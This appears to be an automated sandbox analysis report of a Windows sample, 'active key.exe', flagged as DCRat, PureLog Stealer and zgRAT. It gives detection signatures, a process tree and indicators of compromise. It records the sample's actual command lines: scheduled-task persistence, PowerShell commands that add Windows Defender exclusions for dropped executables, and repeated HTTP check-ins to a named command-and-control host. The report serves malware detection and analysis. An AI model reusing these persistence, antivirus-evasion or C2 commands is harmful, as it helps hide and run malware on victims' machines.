Windows Analysis Report
active key.exe

Overview

General Information

Sample name: active key.exe
Analysis ID: 1502880
MD5: 608de9b0cd5ec54b879965fddbbb9db6
SHA1: a3f0a61fd95098d0389f5e1f7f13850a19338e86
SHA256: 03ee73148f5cbc60f1b281557d813ed9ba7a3097e99bdcf296df70a3777bd3c0
Tags: exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates processes via WMI
Detected VMProtect packer
Drops PE files with benign system names
Drops executables to the windows directory (C:\Windows) and starts them
Found direct / indirect Syscall (likely to bypass EDR)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: System File Execution Location Anomaly
Tries to detect virtualization through RDTSC time measurements
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • active key.exe (PID: 6424 cmdline: "C:\Users\user\Desktop\active key.exe" MD5: 608DE9B0CD5EC54B879965FDDBBB9DB6)
    • conhost.exe (PID: 1596 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1668 cmdline: C:\Windows\system32\cmd.exe /c mode con cols=55 lines=15 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • mode.com (PID: 528 cmdline: mode con cols=55 lines=15 MD5: BEA7464830980BF7C0490307DB4FC875)
    • ntoskrnl2.exe (PID: 5012 cmdline: "C:\Windows\System32\ntoskrnl2.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
      • schtasks.exe (PID: 6060 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 356 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 8 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 5648 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDv" /sc ONLOGON /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 1952 cmdline: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 9 /tr "'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 3504 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 7040 cmdline: schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 3160 cmdline: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 8 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 6308 cmdline: schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 9 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 1404 cmdline: schtasks.exe /create /tn "ntoskrnl2" /sc ONLOGON /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • schtasks.exe (PID: 5356 cmdline: schtasks.exe /create /tn "ntoskrnl2n" /sc MINUTE /mo 5 /tr "'C:\Windows\System32\ntoskrnl2.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • powershell.exe (PID: 5504 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3940 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\fontdrvhost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2348 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5676 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6060 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Public\Pictures\backgroundTaskHost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 7940 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • powershell.exe (PID: 5112 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\System32\ntoskrnl2.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7312 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • chcp.com (PID: 7632 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
        • PING.EXE (PID: 7844 cmdline: ping -n 10 localhost MD5: 2F46799D79D22AC72C241EC0322B011D)
    • cmd.exe (PID: 5648 cmdline: C:\Windows\system32\cmd.exe /c certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 | find /i /v "md5" | find /i /v "certutil" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • certutil.exe (PID: 356 cmdline: certutil -hashfile "C:\Users\user\Desktop\active key.exe" MD5 MD5: F17616EC0522FC5633151F7CAA278CAA)
      • find.exe (PID: 3816 cmdline: find /i /v "md5" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
      • find.exe (PID: 5704 cmdline: find /i /v "certutil" MD5: 4BF76A28D31FC73AA9FC970B22D056AF)
  • explorer.exe (PID: 7200 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • explorer.exe (PID: 7224 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe" MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • ntoskrnl2.exe (PID: 7552 cmdline: C:\Windows\System32\ntoskrnl2.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • ntoskrnl2.exe (PID: 7652 cmdline: C:\Windows\System32\ntoskrnl2.exe MD5: C8848D70C25CF0A1E0A4122CAB55E5F8)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |
00000005.00000002.2321413390.00000000128BD000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
00000005.00000002.2347592089.000000001B180000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
Process Memory Space: ntoskrnl2.exe PID: 5012 | JoeSecurity_DCRat_1 | Yara detected DCRat | Joe Security |

Source | Rule | Description | Author | Strings
5.2.ntoskrnl2.exe.1b180000.4.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.2.ntoskrnl2.exe.1b180000.4.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |
5.2.ntoskrnl2.exe.1b180000.4.raw.unpack | JoeSecurity_zgRAT_1 | Yara detected zgRAT | Joe Security |
5.2.ntoskrnl2.exe.1b180000.4.raw.unpack | JoeSecurity_PureLogStealer | Yara detected PureLog Stealer | Joe Security |

System Summary

Source: File created, Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\ntoskrnl2.exe, ProcessId: 5012, TargetFilename: C:\Users\Public\Pictures\backgroundTaskHost.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\ntoskrnl2.exe" , ParentImage: C:\Windows\System32\ntoskrnl2.exe, ParentProcessId: 5012, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', ProcessId: 5504, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe", CommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe", CommandLine|base64offset|contains: , Image: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, NewProcessName: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, OriginalFileName: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1064, ProcessCommandLine: "C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe", ProcessId: 7200, ProcessName: explorer.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\ntoskrnl2.exe" , ParentImage: C:\Windows\System32\ntoskrnl2.exe, ParentProcessId: 5012, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', ProcessId: 5504, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f, ParentImage: C:\Windows\System32\schtasks.exe, ParentProcessId: 6060, ParentProcessName: schtasks.exe, ProcessCommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, ProcessId: 3504, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\ntoskrnl2.exe" , ParentImage: C:\Windows\System32\ntoskrnl2.exe, ParentProcessId: 5012, ParentProcessName: ntoskrnl2.exe, ProcessCommandLine: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe', ProcessId: 5504, ProcessName: powershell.exe

Persistence and Installation Behavior

Source: Process started, Author: Joe Security: Data: Command: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: schtasks.exe /create /tn "XUkPLaESKIkbWXdxlvmVntDvX" /sc MINUTE /mo 6 /tr "'C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe'" /rl HIGHEST /f, ParentImage: C:\Windows\System32\schtasks.exe, ParentProcessId: 6060, ParentProcessName: schtasks.exe, ProcessCommandLine: schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Users\Public\Pictures\backgroundTaskHost.exe'" /f, ProcessId: 3504, ProcessName: schtasks.exe
Timestamp: 2024-09-02T13:33:41.567921+0200
SID: 2048095
Severity: 1
Source Port: 49732
Destination Port: 80
Protocol: TCP
Classtype: A Network Trojan was detected

AV Detection

Source: active key.exe, Avira: detected
Source: http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php, Avira URL Cloud: Label: phishing
Source: C:\Users\Public\Pictures\backgroundTaskHost.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\Desktop\ZHsakaRB.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Windows\System32\ntoskrnl2.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\rtOHKAESQQ.bat, Avira: detection malicious, Label: BAT/Delbat.C
Source: C:\Users\user\Desktop\mlzPodne.log, Avira: detection malicious, Label: HEUR/AGEN.1300079
Source: C:\Windows\tracing\fontdrvhost.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, Avira: detection malicious, Label: TR/Dropper.Gen
Source: 128538cm.n9shteam3.top, Virustotal: Detection: 12%
Source: http://128538cm.n9shteam3.top/VmPipepacketupdateflowerAsyncDatalifeTempuploads.php, Virustotal: Detection: 9%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, ReversingLabs: Detection: 87%
Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, Virustotal: Detection: 75%
Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe, ReversingLabs: Detection: 87%
Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe, Virustotal: Detection: 75%
Source: C:\Users\Public\Pictures\backgroundTaskHost.exe, ReversingLabs: Detection: 87%
Source: C:\Users\Public\Pictures\backgroundTaskHost.exe, Virustotal: Detection: 75%
Source: C:\Users\user\Desktop\DnHERPdP.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\DnHERPdP.log, Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\UZXJUHSP.log, Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\ZHsakaRB.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\ZHsakaRB.log, Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\aAtQiRdB.log, ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\aAtQiRdB.log, Virustotal: Detection: 28%
Source: C:\Users\user\Desktop\hCHhiobl.log, Virustotal: Detection: 10%
Source: C:\Users\user\Desktop\mlzPodne.log, ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\mlzPodne.log, Virustotal: Detection: 28%
Source: C:\Windows\System32\ntoskrnl2.exe, ReversingLabs: Detection: 87%
Source: C:\Windows\System32\ntoskrnl2.exe, Virustotal: Detection: 75%
Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe, ReversingLabs: Detection: 87%
Source: C:\Windows\en-GB\XUkPLaESKIkbWXdxlvmVntDv.exe, Virustotal: Detection: 75%
Source: C:\Windows\tracing\fontdrvhost.exe, ReversingLabs: Detection: 87%
Source: C:\Windows\tracing\fontdrvhost.exe, Virustotal: Detection: 75%
Source: active key.exe, ReversingLabs: Detection: 68%
Source: active key.exe, Virustotal: Detection: 67%
Source: Submited Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Users\Public\Pictures\backgroundTaskHost.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\ZHsakaRB.log, Joe Sandbox ML: detected
Source: C:\Windows\System32\ntoskrnl2.exe, Joe Sandbox ML: detected
Source: C:\Recovery\XUkPLaESKIkbWXdxlvmVntDv.exe, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\hCHhiobl.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\UZXJUHSP.log, Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\mlzPodne.log, Joe Sandbox ML: detected
Source: C:\Windows\tracing\fontdrvhost.exe, Joe Sandbox ML: detected
Source: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe, Joe Sandbox ML: detected
Source: active key.exe, Joe Sandbox ML: detected
Source: active key.exe, 00000000.00000000.2228522712.00007FF6E959B000.00000002.00000001.01000000.00000003.sdmp, Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_da45acf7-9
Source: C:\Windows\System32\ntoskrnl2.exe, Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe
Source: C:\Windows\System32\ntoskrnl2.exe, Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\7a0fd90576e088
Source: unknown, HTTPS traffic detected: 104.26.0.5:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: active key.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Windows\System32\ntoskrnl2.exe, File opened: C:\Users\user\AppData
Source: C:\Windows\System32\ntoskrnl2.exe, File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\ntoskrnl2.exe, File opened: C:\Users\user
Source: C:\Windows\System32\ntoskrnl2.exe, File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Windows\System32\ntoskrnl2.exe, File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\ntoskrnl2.exe, File opened: C:\Users\user\AppData\Local\Temp

Networking

Source: Network traffic, Suricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.6:49732 -> 80.211.144.156:80
Source: C:\Windows\System32\cmd.exe, Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: Joe Sandbox View, IP Address: 104.26.0.5
Source: Joe Sandbox View, IP Address: 80.211.144.156
Source: Joe Sandbox View, ASN Name: ARUBA-ASNIT
Source: Joe Sandbox View, JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: global traffic, HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 128538cm.n9shteam3.top | Content-Length: 344 | Expect: 100-continue | Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 128538cm.n9shteam3.top | Content-Length: 380 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 128538cm.n9shteam3.top | Content-Length: 1028 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 128538cm.n9shteam3.top | Content-Length: 1340 | Expect: 100-continue
Source: global traffic, HTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1 | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36 | Host: 128538cm.n9shteam3.top | Content-Length: 1024 | Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continue
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 128538cm.n9shteam3.topContent-Length: 1340Expect: 100-continueConnection: Keep-Alive
